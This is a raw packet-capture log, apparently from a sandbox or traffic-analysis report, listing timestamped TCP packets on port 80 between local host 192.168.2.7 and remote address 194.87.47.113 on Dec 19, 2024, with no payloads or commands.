Dec 19, 2024 08:47:33.690951109 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.691339016 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.691622019 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.691818953 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.691886902 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.692368984 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.692537069 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.692755938 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.693104029 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.693290949 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.693377018 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.694027901 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.694227934 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.694467068 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.694776058 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.694961071 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.695097923 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.695528984 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.695682049 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.695769072 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.696358919 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.697479963 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.845136881 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.845357895 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.845541000 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.845571041 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.845926046 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.846426964 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.846549988 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.846626997 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.846977949 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.847035885 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.847636938 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.847701073 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.847719908 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.848007917 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.848089933 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.848376036 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.848706007 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.848789930 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.849014997 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.849431038 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.849781036 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.849894047 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.852247953 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.852425098 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.852602005 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.852705956 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.852715015 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.852808952 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.853305101 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.853702068 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.853848934 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.853918076 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.853991032 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.854336023 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.854784012 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.854912996 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.854984999 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.855519056 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.855698109 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.855786085 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.856296062 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.856493950 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.856584072 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.857825994 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.857960939 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.858063936 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.858338118 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.858764887 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.858829021 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.858902931 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.858952045 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.859353065 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.859674931 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.859756947 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.859924078 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.860213995 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.860276937 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.860759974 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.860934973 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.861438990 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.861536026 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.861814976 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.862353086 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.862432957 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.862529039 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.863075018 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.863178015 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.863338947 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.863394976 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.863884926 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.864068031 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.864196062 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.864633083 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.864945889 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.865022898 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.865483046 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.865801096 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.866269112 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.866364002 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.866440058 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.867132902 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.867202044 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.867275000 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.867275000 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.867830992 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.868033886 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.868244886 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.868799925 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.868860960 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.868946075 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.869463921 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.869668961 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.870245934 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.870337009 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.870419025 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.871155977 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.871165037 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.871222019 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.871921062 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.871999979 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.872648001 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.872733116 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.872766972 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.873405933 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.873611927 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.873637915 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.874269962 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.874438047 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.874456882 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.874982119 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.875096083 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.875163078 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.875303030 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.875827074 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.875921011 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.875972986 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.876586914 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.876713991 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.876921892 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.877419949 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.877657890 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.878159046 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.878285885 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.878315926 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.878943920 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.879029989 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.879123926 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.879472017 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.879724026 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.879873991 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.879945040 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.880501032 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.880759001 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.880922079 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.881325006 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.881573915 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.882088900 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.882203102 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.882402897 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.882893085 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.883086920 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.883105993 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.883259058 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.883675098 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.884299040 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.884422064 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.884531021 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.884701014 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.884780884 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.885282993 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.885481119 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.886110067 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.886173010 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.886262894 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.886919975 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.886979103 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.887151003 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.887337923 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.887618065 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.887816906 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.887954950 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:33.888437986 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:33.934691906 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.037225962 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.037369013 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.037420988 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.037717104 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.037733078 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.037822962 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.038450003 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.038744926 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.038996935 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.039057016 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.039778948 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.039829016 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.039992094 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.040283918 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.040471077 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.040751934 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.041193962 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.041265011 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.041568995 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.041933060 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.041997910 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.044553995 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.044727087 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.044817924 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.045665026 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.045986891 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.046066046 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.046355009 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.046371937 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.046439886 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.047019958 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.047380924 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.047504902 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.047828913 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.048171043 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.048224926 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.048547029 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.048564911 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.048638105 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.049252987 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.049572945 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.049634933 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.049921036 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.050180912 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.050302029 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.050436974 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.050837994 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.050899982 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.051188946 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.051548958 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.051635981 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.051892042 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.052366018 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.052433968 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.052447081 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.052956104 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.053056002 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.053127050 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.053770065 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.053910017 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.053926945 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.054546118 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.054642916 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.054727077 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.055469990 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.055521011 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.055596113 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.056149006 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.056196928 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.056328058 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.056869984 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.056937933 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.057060003 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.057698965 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.057765961 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.057871103 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.058506966 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.058559895 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.058715105 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.059361935 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.059423923 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.059555054 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.060106039 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.060201883 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.060250044 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.060990095 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.061120987 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.061152935 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.061669111 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.061733961 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.061825991 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.062582970 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.062629938 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.062745094 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.063200951 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.063278913 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.063400030 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.064017057 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.064074993 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.064177036 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.064892054 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.064963102 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.065015078 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.065591097 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.065783024 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.065871954 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.066520929 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.066706896 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.066737890 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.067234039 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.067291975 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.067420959 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.067955017 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.068048000 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.068254948 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.068762064 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.068819046 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.068965912 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.069601059 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.069659948 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.069747925 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.070431948 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.070503950 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.070590019 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.071182013 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.071295977 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.071329117 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.071973085 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.072173119 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.072266102 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.072747946 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.072930098 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.073158979 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.074731112 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.074750900 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.074768066 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.074785948 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.074829102 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.074829102 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.075131893 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.075361967 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.075500965 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.075875998 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.075933933 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.076061010 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.076697111 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.076775074 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.076924086 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.077502966 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.077641964 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.077707052 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.078269005 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.078345060 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:34.078560114 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:34.079097986 CET	80	49707	194.87.47.113	192.168.2.7
